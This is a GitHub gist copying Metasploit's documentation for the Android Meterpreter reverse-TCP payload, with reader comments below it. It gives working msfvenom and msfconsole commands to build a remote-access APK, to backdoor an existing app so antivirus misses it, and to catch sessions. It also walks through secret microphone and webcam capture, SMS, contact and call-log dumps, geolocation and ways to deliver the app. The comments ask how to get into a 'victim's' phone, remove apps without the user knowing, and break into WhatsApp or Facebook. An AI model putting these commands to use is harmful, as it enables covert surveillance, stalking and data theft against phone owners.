-
-
Save mataprasad/c5dd39154a852cdc67ff7958e0a82699 to your computer and use it in GitHub Desktop.
The android/meterpreter/reverse_tcp payload is a Java-based Meterpreter that can be used on an | |
Android device. It is still at an early stage of development, but there are so many things you can | |
do with it already. | |
The Android Meterpreter allows you to do things like take remote control the file system, listen to phone calls, retrieve or send SMS messages, geo-locate the user, run post-exploitation modules, etc. | |
## Vulnerable Application | |
You can test android/meterpreter/reverse_tcp on these devices: | |
**Android Emulator** | |
An emulator is the most convenient way to test Android Meterpreter. You can try: | |
* [Android SDK](http://developer.android.com/sdk/index.html#Other) - Creates and manages your emulators from a command prompt or terminal. | |
* [Android Studio](http://developer.android.com/sdk/installing/index.html?pkg=studio) - Allows you to manage emulators more easily than the SDK. | |
* [GenyMotion](https://www.genymotion.com/download/) - Requires an account. | |
* [AndroidAVDRepo](https://github.com/dral3x/AndroidAVDRepo) - Contains a collection of pre-configured emulators. | |
**A real Android device** | |
Having a real Android device allows you to test features or vulnerabilities you don't necessarily | |
have from an emulator, which might be specific to a manufacturer, carrier, or hardware. You also | |
get to test it over a real network. | |
## Verification Steps | |
Currently, the most common way to use Android Meterpreter is to create it as an APK, and then | |
execute it. | |
To create the APK with msfconsole: | |
``` | |
msf > use payload/android/meterpreter/reverse_tcp | |
msf payload(reverse_tcp) > set LHOST 192.168.1.199 | |
LHOST => 192.168.1.199 | |
msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk | |
[*] Writing 8992 bytes to /tmp/android.apk... | |
msf payload(reverse_tcp) > | |
``` | |
To create the APK with msfvenom: | |
``` | |
./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk | |
``` | |
You can also add Android meterpreter to any existing APK. This will make it harder for | |
Anti-virus software to detect the payload, and allow you read internal files and take | |
screenshots of the Android app you are backdooring: | |
``` | |
./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk | |
``` | |
Next, start an Android device. Upload the APK, and execute it. There are different ways to do this, | |
so please refer to the Scenarios section for more information. | |
## Important Basic Commands | |
**pwd** | |
The ```pwd``` command allows you to see the current directory you're in. | |
``` | |
meterpreter > pwd | |
/data/data/com.metasploit.stage | |
``` | |
**cd** | |
The ```cd``` command allows you to change directory. For example: | |
``` | |
meterpreter > cd cache | |
meterpreter > ls | |
``` | |
**cat** | |
The ```cat``` command allows you to see the contents of a file. | |
**ls** | |
The ```ls``` command displays items in a directory. For example: | |
``` | |
meterpreter > ls | |
Listing: /data/data/com.metasploit.stage/files | |
============================================== | |
Mode Size Type Last modified Name | |
---- ---- ---- ------------- ---- | |
100444/r--r--r-- 0 fil 2016-03-08 14:56:08 -0600 rList-com.metasploit.stage.MainActivity | |
``` | |
**upload** | |
The ```upload``` command allows you to upload a file to the remote target. The ```-r``` option | |
allows you to do so recursively. | |
**download** | |
The ```download``` command allows you to download a file from the remote target. The ```-r``` | |
option allows you to do so recursively. | |
**search** | |
The ```search``` command allows you to find files on the remote target. For example: | |
``` | |
meterpreter > search -d . -f *.txt | |
``` | |
**ifconfig** | |
The ```ifconfig``` command displays the network interfaces on the remote machine. | |
``` | |
meterpreter > ifconfig | |
... | |
Interface 10 | |
============ | |
Name : wlan0 - wlan0 | |
Hardware MAC : 60:f1:89:07:c2:7e | |
IPv4 Address : 192.168.1.207 | |
IPv4 Netmask : 255.255.255.0 | |
IPv6 Address : 2602:30a:2c51:e660:62f1:89ff:fe07:c27e | |
IPv6 Netmask : :: | |
IPv6 Address : fe80::62f1:89ff:fe07:c27e | |
IPv6 Netmask : :: | |
IPv6 Address : 2602:30a:2c51:e660:81ae:6bbd:e0e1:5954 | |
IPv6 Netmask : :: | |
... | |
``` | |
**getuid** | |
The ```getuid``` command shows the current user that the payload is running as: | |
``` | |
meterpreter > getuid | |
Server username: u0_a231 | |
``` | |
**ps** | |
The ```ps``` command shows a list of processes the Android device is running. For example: | |
``` | |
meterpreter > ps | |
Process List | |
============ | |
PID Name Arch User | |
--- ---- ---- ---- | |
1 /init root | |
2 kthreadd root | |
3 ksoftirqd/0 root | |
7 migration/0 root | |
8 rcu_preempt root | |
9 rcu_bh root | |
10 rcu_sched root | |
11 watchdog/0 root | |
12 watchdog/1 root | |
13 migration/1 root | |
14 ksoftirqd/1 root | |
17 watchdog/2 root | |
18 migration/2 root | |
19 ksoftirqd/2 root | |
22 watchdog/3 root | |
23 migration/3 root | |
... | |
``` | |
**shell** | |
The ```shell``` command allows you to interact with a shell: | |
``` | |
meterpreter > shell | |
Process 1 created. | |
Channel 1 created. | |
id | |
uid=10231(u0_a231) gid=10231(u0_a231) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),9997(everybody),50231(all_a231) context=u:r:untrusted_app:s0 | |
``` | |
To get back to the Meterpreter prompt, you can do: [CTRL]+[Z] | |
**sysinfo** | |
The ```sysinfo``` command shows you basic information about the Android device. | |
``` | |
meterpreter > sysinfo | |
Computer : localhost | |
OS : Android 5.1.1 - Linux 3.10.61-6309174 (aarch64) | |
Meterpreter : java/android | |
``` | |
**webcam_list** | |
The ```webcam_list``` command shows a list of webcams you could use for the ```webcam_snap``` | |
command. Example: | |
``` | |
meterpreter > webcam_list | |
1: Back Camera | |
2: Front Camera | |
``` | |
**webcam_snap** | |
The ```webcam_snap``` command takes a picture from the device. You will have to use the | |
```webcam_list``` command to figure out which camera to use. Example: | |
``` | |
meterpreter > webcam_snap -i 2 | |
[*] Starting... | |
[+] Got frame | |
[*] Stopped | |
Webcam shot saved to: /Users/user/rapid7/msf/uFWJXeQt.jpeg | |
``` | |
**record_mic** | |
The ```record_mic``` command records audio. Good for listening to a phone conversation, as well as | |
other uses. Example: | |
``` | |
meterpreter > record_mic -d 20 | |
[*] Starting... | |
[*] Stopped | |
Audio saved to: /Users/user/rapid7/msf/YAUtubCR.wav | |
``` | |
**activity_start** | |
The ```activity_start``` command is an execute command by starting an Android activity from a URI | |
string. | |
**check_root** | |
The ```check_root``` command detects whether your payload is running as root or not. Example: | |
``` | |
meterpreter > check_root | |
[*] Device is not rooted | |
``` | |
**dump_calllog** | |
The ```dump_calllog``` command retrieves the call log from the Android device. | |
**dump_contacts** | |
``` | |
meterpreter > dump_contacts | |
[*] Fetching 5 contacts into list | |
[*] Contacts list saved to: contacts_dump_20160308155744.txt | |
``` | |
**geolocate** | |
The ```geolocate``` commands allows you to locate the phone by retrieving the current lat-long | |
using geolocation. | |
**wlan_geolocate** | |
The ```wlan_geolocation``` command allows you to locate the phone by retrieving the current | |
lat-long using WLAN information. Example: | |
``` | |
meterpreter > wlan_geolocate | |
[*] Google indicates the device is within 150 meters of 30.*******,-97.*******. | |
[*] Google Maps URL: https://maps.google.com/?q=30.*******,-97.******* | |
``` | |
**send_sms** | |
The ```send_sms``` command allows you to send an SMS message. Keep in mind the phone will keep a | |
copy of it, too. | |
``` | |
meterpreter > send_sms -d "2674554859" -t "hello" | |
[+] SMS sent - Transmission successful | |
``` | |
**sms_dump** | |
The ```sms_dump``` command allows you to retrieve SMS messages. And save them as a text file. | |
For example: | |
``` | |
meterpreter > dump_sms | |
[*] Fetching 4 sms messages | |
[*] SMS messages saved to: sms_dump_20160308163212.txt | |
... | |
$ cat sms_dump_20160308163212.txt | |
===================== | |
[+] SMS messages dump | |
===================== | |
Date: 2016-03-08 15:30:12 -0600 | |
OS: Android 5.1.1 - Linux 3.10.61-6309174 (aarch64) | |
Remote IP: 192.168.1.207 | |
Remote Port: 59130 | |
#1 | |
Type : Incoming | |
Date : 2016-03-08 15:29:32 | |
Address : ********** | |
Status : NOT_RECEIVED | |
Message : Hello world | |
... | |
``` | |
**run** | |
The ```run``` command allows you to run a post module against the remote machine at the Meterpreter | |
prompt. For example: | |
``` | |
meterpreter > run post/android/capture/screen | |
``` | |
## Scenarios | |
**Uploading APK to an Emulator using install_msf_apk.sh** | |
The Metasploit Framework comes with a script that allows you to automatically upload your APK to | |
an active emulator and execute it. It requires the [Android SDK platform-tools](http://developer.android.com/sdk/installing/index.html) to run, as well as [Java](https://java.com/en/download/). | |
To use this, follow these steps: | |
1. Start the Android Emulator | |
2. Generate the Android payload as an APK. | |
3. In msfconsole, start a handler for android/meterpreter/reverse_tcp | |
4. Run the installer script like this from a terminal: | |
``` | |
$ tools/exploit/install_msf_apk.sh /tmp/android.apk | |
``` | |
The the script will do something like this: | |
``` | |
$ tools/exploit/install_msf_apk.sh /tmp/android.apk | |
adding: META-INF/ANDROIDD.SF | |
adding: META-INF/ANDROIDD.RSA | |
signing: classes.dex | |
signing: AndroidManifest.xml | |
signing: resources.arsc | |
Failure | |
1562 KB/s (10715 bytes in 0.006s) | |
pkg: /data/local/tmp/android.apk | |
Success | |
rm failed for -f, Read-only file system | |
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity } | |
``` | |
Back in msfconsole, you should receive a session: | |
``` | |
[*] Started reverse TCP handler on 192.168.1.199:4444 | |
[*] Starting the payload handler... | |
[*] Sending stage (62432 bytes) to 192.168.1.199 | |
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.199:49178) at 2016-03-08 13:00:10 -0600 | |
meterpreter > | |
``` | |
**Uploading APK to a real Android device using install_msf_apk.sh** | |
On the Android device, make sure to enable Developer Options. To do this: | |
1. Go to Settings -> About -> Software Information | |
2. Tap on the Build Number section a couple of times. It should unlock Developer Options. | |
3. Go back to the Settings page, you should see Developer Options. | |
Under Developer Options, make sure to: | |
* Enable USB debugging | |
* Disable Verify apps via USB | |
* Open a terminal, and type: ```adb devices```. On your Android device, you should see a prompt | |
asking you to allow the computer for debugging, click OK on that. | |
* Do: ```adb devices``` again, adb should now have access. | |
Run the installer script like this from a terminal: | |
``` | |
$ tools/exploit/install_msf_apk.sh /tmp/android.apk | |
``` | |
And you should get a session. | |
**Uploading APK from a Web Server** | |
One way to upload an APK to Android without adb is by hosting it from a web server. To do this, | |
you must make sure to allow to trust "Unknown sources". The way to do this varies, but normally | |
it's something like this: Settings -> Security -> Check "Unknown Sources" | |
Once you have that changed, you'll need to: | |
1. Generate the APK payload. | |
2. Start a web server from the directory where the payload is: ```ruby -run -e httpd . -p 8181``` | |
3. On your Android device, open a browser, and download the APK. | |
4. You should be able to find the APK from the Downloads folder, install it. | |
5. After installation, you will have to manually execute it. | |
**Reconnect Android Meterpreter from the Browser Remotely** | |
When you have the APK payload installed on your Android device, another trick to reconnect it is to | |
launch an intent from a browser. An intent is simply a term in Android development that means "an operation to be performed." | |
Here's how you do this: | |
1. In msfconsole, start a multi/handler for android/meterpreter/reverse_tcp as a background job. | |
2. Do: ```auxiliary/server/android_browsable_msf_launch```. | |
3. Set the URIPATh if needed. | |
4. Do: ```run```. At this point, the web server should be up. | |
5. On your Android device, open the native web browser, and go the URL generated by the auxiliary | |
module. | |
6. The Android handler should get a session like the following demo: | |
``` | |
msf > use exploit/multi/handler | |
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp | |
PAYLOAD => android/meterpreter/reverse_tcp | |
msf exploit(handler) > set LHOST 192.168.1.199 | |
LHOST => 192.168.1.199 | |
msf exploit(handler) > set EXITONSESSION false | |
EXITONSESSION => false | |
msf exploit(handler) > run -j | |
[*] Exploit running as background job. | |
[*] Started reverse TCP handler on 192.168.1.199:4444 | |
msf exploit(handler) > [*] Starting the payload handler... | |
msf exploit(handler) > use auxiliary/server/android_browsable_msf_launch | |
msf auxiliary(android_browsable_msf_launch) > set URIPATH /test | |
URIPATH => /test | |
msf auxiliary(android_browsable_msf_launch) > run | |
[*] Using URL: http://0.0.0.0:8080/test | |
[*] Local IP: http://192.168.1.199:8080/test | |
[*] Server started. | |
[*] Sending HTML... | |
[*] Sending stage (62432 bytes) to 192.168.1.207 | |
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.207:47523) at 2016-03-08 15:09:25 -0600 | |
``` |
how do i enter the storage on victims phone? am trying with cd /storage but caant see anything
how to uninstall an app...when i run "app_uninstall packagename" it shows the request on the android phone...is there a way to uninstall the app without letting the user known..by forcefully..?
I already make a connection between target and me , now meterpreter session open successfully and some commands are running beautifuly but some commands like "screenshare", "screenshot", "smsdump" are not working for a Android version target
Good morning. I've been trying to use the "dumb_contact" command for a few days now but he tells me no contacts have been found. Do you have any solution? (android / meterpreter_reverse_tcp)
HI i have the same issues. were you able to resolve this issue?
Hola cómo puedo usar la aplicación para entrar a otro whassp o Facebook
Thanks all are working except send_sms